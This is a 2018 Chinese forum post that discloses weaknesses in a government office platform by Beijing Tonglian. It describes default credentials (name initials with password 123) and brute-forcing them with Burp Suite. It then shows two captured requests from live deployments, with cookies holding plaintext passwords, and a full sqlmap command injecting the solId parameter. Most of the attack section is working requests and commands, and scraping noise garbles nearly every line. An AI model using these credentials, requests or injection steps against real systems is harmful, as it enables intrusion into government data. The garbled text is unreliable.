|
+ J: z9 q- X; ^) M
% V3 S( O3 C( ?9 o
- y1 t4 y5 V' _
, i+ X5 m4 a! @
平台简介:9 X2 Q- i% D; P; g' r; ]; [2 D4 `+ B
8 f- \ I7 D- E2 i
- f) t) f2 q7 y9 x2 E/ p G" T" ` # C5 n4 `& F, q E( Z% L
. ^! x5 v& \) D4 d
1 k7 T; H) F) w0 `$ S 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
& E6 |) d* W5 q' y0 Y. N& L
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
; A6 f+ U+ l' a7 @同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
( v9 U7 @/ I( l+ e, U: \ * S/ u. X6 ]5 d1 q/ |. |
& P. r- X! Q3 A, Q- X4 U6 P
; k) p' v! d4 r7 R/ g- t8 B6 \ ) w/ Z7 R6 S1 i0 {/ ?/ |) J
; ]# U6 I! D& `! v1 r$ a; z# q 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:! t$ P8 g: D* H7 G
. g- u4 W% \. u: v) _4 }
' Q# y; A& e7 y% x) I4 ` & B9 @2 ?9 A& @) V
- V8 x8 o8 h$ k" C5 W
" z& c4 C" W, @* C: k http://1.1.1.1:7197/cap-aco/#(案例2-)
! E6 } J g# ] q* n1 j" K q2 _6 G9 ^7 i' L7 l$ c
$ `) B, P/ X8 o4 Y$ J4 ^ http://www.XXOO.com (案例1-官网网站)
8 y. K( J/ t- T
1 N" o% w% u9 l/ u, P2 [% }
M. u! _+ s$ X2 h% n ! g$ b7 r) R$ A+ h; W
+ o! q0 L1 O; U1 L3 v8 Q
+ q( _8 n: d, J7 Y6 n. v4 X8 i& s
漏洞详情:
( o" @! e4 X2 @: m; v ) P/ u0 ?/ y" W/ }" ?
1 Z- M# P& j$ ?$ j0 C( l 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
* D; ]+ Q( f( C8 y
2 C0 D9 H3 W3 y* k! ~
8 o* U6 [8 ?4 \0 t# X/ Z 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
# Z$ N' r/ }* Z; d " J* F$ `$ N' H7 R9 z/ S7 v
6 ]3 M9 d" y+ g0 x" [ 0 A5 |* ^& p3 @" S* \7 g: [6 s3 U
+ M6 [/ g# l8 d' v, m$ c1 I, V- n
$ }% H* B4 b; L1 X- E" Z  ) y5 X# }* ^# L8 Z/ B
# Z" E5 }* K' H4 b6 j# M4 U6 V0 w% I& O# B2 S
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
% R/ q% j0 { t3 P) m
$ k, g4 P+ l2 A( W0 o
& j- O5 Q5 O: J" y# W3 t7 Z( Q 1、案例1-官方网站. V/ Y4 C4 o# G8 k8 q
. n1 H! l' u* G- e
, D f r' C0 K+ v9 ~
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
1 U! s: h3 D, p, ^ ; y) \! B4 W z8 R1 K
- w) P6 y4 ]* z Host: www.XXOO.com) j7 n1 V; D1 {' m2 q/ Z
6 [) R7 I- E, A6 X# v5 R) }
- V$ L7 s& \$ c8 v
Proxy-Connection: Keep-Alive2 R. a7 {- x0 X0 g! L2 |4 q6 D
( `3 r* u, p8 [# x, V& ^
4 z6 |- e8 s! E2 m; s9 p. m Accept: application/json, text/javascript, */*; q=0.01
8 [: l8 u* Z* ]% {
$ e( z9 X) Y' l; `7 I w, X. }9 v0 q4 S0 ~ Y# c* F+ O
Accept-Language: zh-CN
' z# N& p: ~- y# Y 5 x# Y) @: w% {4 Y; j
8 X% X' A" Y7 t: G; B
Content-Type: application/json
& O, i( D. `) [+ T( P' w8 G( b " M3 F8 C6 o9 ?: x/ n$ l8 q. T
& p( m" Y1 l* \
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
& V- N5 G6 ~+ g+ r) f3 a% |( J% @# O5 b
: w$ N/ d/ n" m) v" T1 |5 K, m5 o
X-Requested-With: XMLHttpRequest" T$ y7 n+ f6 m" [6 ?7 v4 _
8 Q& S" w) [$ `& j7 n5 R/ u8 N" e% a
! j) x* ]2 K# E4 q! p4 I! M
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002" Y( F K. T# ~/ b
) v( K6 J! h2 Q
- I5 ` F6 w0 K Accept-Encoding: gzip, deflate, sdch1 N8 l5 n! K8 l, e
+ |4 S3 ^. U- H/ O1 q7 t2 u) Q3 N. N8 K3 [9 S: h! _7 m
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
- n$ r9 Z3 M' J- @& ` 8 O7 I1 s9 d( g7 x" z
+ w7 T4 y# w% |7 w# O+ U/ S& T 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
3 H, q2 j( x6 e' ~2 ^7 b4 }7 I 8 U) l x' W8 w4 r. t& }
( W. `7 [, X0 y- i% p& A9 O
 8 o0 G P: k- f5 y6 b
; z3 d$ T9 Z9 W5 }# g3 B
$ v/ }! L- }9 F 
; Y N1 E* n* ` e. q
2 B% @4 T9 ] B; K) [, a; ]5 ^; q2 u) Y$ t, v
' S) B/ {: X* e5 y& W * Q. ] W9 z/ c( S, x% G$ u1 L
1 C/ l! u1 f; t5 M) X- |/ x* L8 l- b6 u
/ c2 [7 ~ N0 a8 j1 A
( E5 F" p9 c( A. A5 v
6 m6 `; q* M% E6 v* O( O
! K3 V% z$ s6 C# ^$ u! K) r' j
9 V9 S, H K! G* [' Q5 s7 u& O4 N& U% u1 V0 H
2、案例2-某天河云平台/ ]. ?+ k/ g, y
6 Y, P% T# X& i. I% a2 u5 {4 G4 G0 \* o* _* r) r9 ^# R& G
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1' H1 K5 a" k8 y, n' `8 q! ]
! w" \* t. b* E% N' z6 _
8 J9 a: ~; F1 F3 f) z
Host: 1.1.1.:7197
% u3 K* i: ^: X% W8 ?! v# { 7 i% Z# V3 v# w
4 W, {, @# t- T Accept: application/json, text/javascript, */*; q=0.01. H- z! ^3 V5 N$ d" I4 I7 n
4 L: T1 g3 Z. a# z. L1 G9 S- @
! z1 k; ?% f2 M# H( _2 R; g
X-Requested-With: XMLHttpRequest
1 O3 J! _$ ]( K
2 R0 k4 [9 i# q; P2 Z! h
& r3 b/ u5 b+ u$ D; c User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0) B/ L: {+ K/ i! {* r, B3 v* I( I4 L
6 \' \, @. h$ e0 _
4 l! v. d/ }6 \' u: s: p: Z
Content-Type: application/json
8 v6 \! ^) w+ }/ @ e
& @9 j B! p" c2 q8 s, `4 J
, [* s3 f& A, |' [( J Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
/ H+ F1 x1 q" H
/ j; f, F% F' y2 J' R% R" ~- L) \6 f
Accept-Language: zh-CN,zh;q=0.8
; w: L# B; S! b8 N* R& t 4 M$ E6 G7 o' C, ?. X
- V/ l0 j9 q4 c, I& j, g Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=11 n8 q# F% a- T6 c1 a
+ X) w7 `- D4 P2 q6 ]5 G* H G
' m- g7 v9 ]- R) h5 }( y Connection: close
. I9 R; N: n" ~7 A+ |$ Y1 i2 N
7 ~% _; {! R( [5 L9 z% W7 `* q6 l( H% [ Q; z w4 I# i
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
9 T+ k- |# _( F( S! H/ k( E4 C' Q( B
' |) W( I. c( e* {- X# B
) N% ~- Z: V; M" f 
- O1 N3 O! N; s% K0 M S" u+ s
) J2 {' A+ u3 H7 C* {4 h* G5 x! L& Q3 v
5 M4 I( R6 w0 g& ^9 y9 l | 
发表于 2018-10-20 20:15:17
收藏
支持
反对